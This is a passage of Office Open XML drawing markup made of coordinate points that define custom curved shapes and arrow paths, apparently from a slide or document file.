                  <a:lnTo>
                    <a:pt x="1662913" y="3130484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710096" y="3126941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756881" y="3122016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1803246" y="3115730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849172" y="3108102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894637" y="3099155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939622" y="3088907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984106" y="3077381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2028069" y="3064595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071489" y="3050571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114347" y="3035329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2156621" y="3018889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198292" y="3001273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2239339" y="2982500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279742" y="2962591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319479" y="2941567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358531" y="2919447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396876" y="2896253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434495" y="2872005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2471367" y="2846724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2507472" y="2820429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2542788" y="2793142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577296" y="2764883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2610974" y="2735672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2643803" y="2705529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2675762" y="2674477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706831" y="2642534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736988" y="2609721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766214" y="2576059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794488" y="2541569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821789" y="2506270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2848097" y="2470183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873392" y="2433329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897652" y="2395729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920858" y="2357402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2942989" y="2318369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2964025" y="2278651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2983944" y="2238268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3002727" y="2197241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3020352" y="2155589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3036801" y="2113335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3052051" y="2070497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066082" y="2027098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078875" y="1983156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3090408" y="1938692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3100660" y="1893728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3109613" y="1848283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3117244" y="1802379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123534" y="1756034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128462" y="1709271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132007" y="1662109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134149" y="1614569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134867" y="1566672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134149" y="1518774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132007" y="1471234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128462" y="1424072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123534" y="1377309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3117244" y="1330964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3109613" y="1285060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3100660" y="1239615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3090408" y="1194651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078875" y="1150187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066082" y="1106245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3052051" y="1062846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3036801" y="1020008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3020352" y="977754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3002727" y="936102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2983944" y="895075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2964025" y="854692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2942989" y="814974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920858" y="775941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897652" y="737614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873392" y="700014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2848097" y="663160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821789" y="627073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794488" y="591774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766214" y="557284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736988" y="523622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706831" y="490809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2675762" y="458866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2643803" y="427814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2610974" y="397671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577296" y="368460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2542788" y="340201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2507472" y="312914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2471367" y="286619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434495" y="261338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396876" y="237090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358531" y="213896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319479" y="191776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279742" y="170752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2239339" y="150843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198292" y="132070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2156621" y="114454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114347" y="98014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071489" y="82772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2028069" y="68748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984106" y="55962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939622" y="44436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894637" y="34188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849172" y="25241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1803246" y="17613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756881" y="11327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710096" y="6402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662913" y="2859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615352" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1567434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458676" y="3066428"/>
              <a:ext cx="1862455" cy="4784090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="93892" y="4710289"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30773" y="4767439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114339" y="4783695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106769" y="4756517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93638" y="4756517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90209" y="4744325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102415" y="4740886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93892" y="4710289"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="102415" y="4740886"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90209" y="4744325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93638" y="4756517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105820" y="4753109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102415" y="4740886"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="105820" y="4753109"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93638" y="4756517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106769" y="4756517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105820" y="4753109"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="186221" y="4714353"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108116" y="4739245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108243" y="4739245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102415" y="4740886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105820" y="4753109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111799" y="4751437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190158" y="4726418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223807" y="4714480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185967" y="4714480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186221" y="4714353"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="262802" y="4687175"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="185967" y="4714480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223807" y="4714480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267120" y="4699113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297304" y="4687302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262675" y="4687302"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="849734" y="4386185"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="828587" y="4386185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762801" y="4431524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695618" y="4474831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626911" y="4515979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556807" y="4554841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485179" y="4591290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485433" y="4591290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412408" y="4625707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338113" y="4657711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338367" y="4657711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262675" y="4687302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297304" y="4687302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343066" y="4669395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417742" y="4637264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490894" y="4602720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562903" y="4565890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633261" y="4526901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702349" y="4485499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="769913" y="4442065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835826" y="4396472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849734" y="4386185"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="556934" y="4554714"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556685" y="4554841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556934" y="4554714"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="627038" y="4515852"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="626809" y="4515979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627038" y="4515852"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="695745" y="4474704"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="695533" y="4474831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695745" y="4474704"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="762928" y="4431397"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="762731" y="4431524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762928" y="4431397"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1149614" y="4129391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1131863" y="4129391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074586" y="4184636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015531" y="4238103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954825" y="4289411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892468" y="4338814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828333" y="4386312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828587" y="4386185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849734" y="4386185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="900215" y="4348847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962953" y="4299190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024040" y="4247501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083349" y="4193907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140753" y="4138535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149614" y="4129391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="892595" y="4338687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="892424" y="4338814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892595" y="4338687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="954952" y="4289284"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="954792" y="4289411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954952" y="4289284"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1015658" y="4237976"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1015508" y="4238103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015658" y="4237976"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1204334" y="4072368"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1187235" y="4072368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131805" y="4129446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149614" y="4129391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196379" y="4081131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204334" y="4072368"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1257257" y="4013567"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1240702" y="4013567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186981" y="4072495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187235" y="4072368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204334" y="4072368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1250100" y="4021949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1257257" y="4013567"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1308519" y="3952988"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1292264" y="3952988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240575" y="4013694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1257257" y="4013567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1302043" y="3961116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308519" y="3952988"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1357694" y="3890758"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1341794" y="3890758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1292137" y="3953115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308519" y="3952988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1351827" y="3898632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1357694" y="3890758"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1404928" y="3826877"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1389419" y="3826877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341667" y="3890885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1357694" y="3890758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1399706" y="3834370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1404928" y="3826877"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1493252" y="3694289"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1478446" y="3694289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1434885" y="3761599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1389292" y="3827004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1404928" y="3826877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1445553" y="3768584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489114" y="3701147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493252" y="3694289"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1435012" y="3761345"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1434835" y="3761599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435012" y="3761345"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1609689" y="3484358"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1595667" y="3484358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1558710" y="3555986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519721" y="3625963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1478319" y="3694416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493252" y="3694289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1530643" y="3632313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1570013" y="3561828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606970" y="3490073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1609689" y="3484358"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1519721" y="3625836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1519645" y="3625963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519721" y="3625836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1676111" y="3337419"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1662469" y="3337419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630211" y="3411714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1595540" y="3484485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1595667" y="3484358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1609689" y="3484358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641768" y="3416921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674153" y="3342372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676111" y="3337419"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1630211" y="3411587"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1705762" y="3261981"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1692314" y="3261981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662342" y="3337546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676111" y="3337419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704125" y="3266553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705762" y="3261981"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1757788" y="3107549"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1744638" y="3107549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1719619" y="3185527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692187" y="3262235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692314" y="3261981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705762" y="3261981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1731684" y="3189591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756703" y="3111359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1757788" y="3107549"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1719619" y="3185400"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1795462" y="2967595"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1782484" y="2967595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1766990" y="3028809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744511" y="3107803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744638" y="3107549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1757788" y="3107549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1779309" y="3031984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1794803" y="2970516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795462" y="2967595"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1766990" y="3028555"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1766918" y="3028809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1766990" y="3028555"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1821259" y="2845294"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1808392" y="2845294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1796200" y="2906635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1782357" y="2967722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795462" y="2967595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1808646" y="2909175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1820838" y="2847707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821259" y="2845294"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1796200" y="2906381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1796143" y="2906635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1796200" y="2906381"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1862109" y="2419590"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1849413" y="2419590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848270" y="2480169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1845476" y="2540875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1845413" y="2541510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1841158" y="2601581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1835316" y="2662541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827950" y="2723374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818933" y="2784588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1808265" y="2845548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1808392" y="2845294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821259" y="2845294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1831506" y="2786493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1840523" y="2725025"/>
